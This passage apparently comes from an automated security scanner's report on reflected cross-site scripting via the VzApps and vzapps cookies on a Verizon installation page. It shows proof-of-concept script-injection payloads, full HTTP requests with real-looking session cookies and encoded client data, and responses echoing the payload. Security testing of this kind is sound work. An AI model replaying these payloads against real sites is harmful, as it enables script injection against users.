MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57967
Expires: Sat, 20 Nov 2010 03:14:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX6487d'><script>alert(1)</script>b45a269dda5; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6487D'><SCRIPT>ALERT(1)</SCRIPT>B45A269DDA5 ' />
...[SNIP]...

3.207. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f5315'><script>alert(1)</script>2c1f456c2c6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf5315'><script>alert(1)</script>2c1f456c2c6; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58000
Expires: Sat, 20 Nov 2010 03:14:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:08 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf5315'><script>alert(1)</script>2c1f456c2c6; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF5315'><SCRIPT>ALERT(1)</SCRIPT>2C1F456C2C6 ' />
...[SNIP]...

3.208. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 86aaa<script>alert(1)</script>b944052706a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX86aaa<script>alert(1)</script>b944052706a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57997
Expires: Sat, 20 Nov 2010 03:14:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX86aaa<script>alert(1)</script>b944052706a; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX86AAA<SCRIPT>ALERT(1)</SCRIPT>B944052706A </DIV>
...[SNIP]...

3.209. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e0ce9'><script>alert(1)</script>6ae6011d9f2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe0ce9'><script>alert(1)</script>6ae6011d9f2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58000
Expires: Sat, 20 Nov 2010 00:09:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe0ce9'><script>alert(1)</script>6ae6011d9f2; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<input type='hidden' id='locationInfo' value=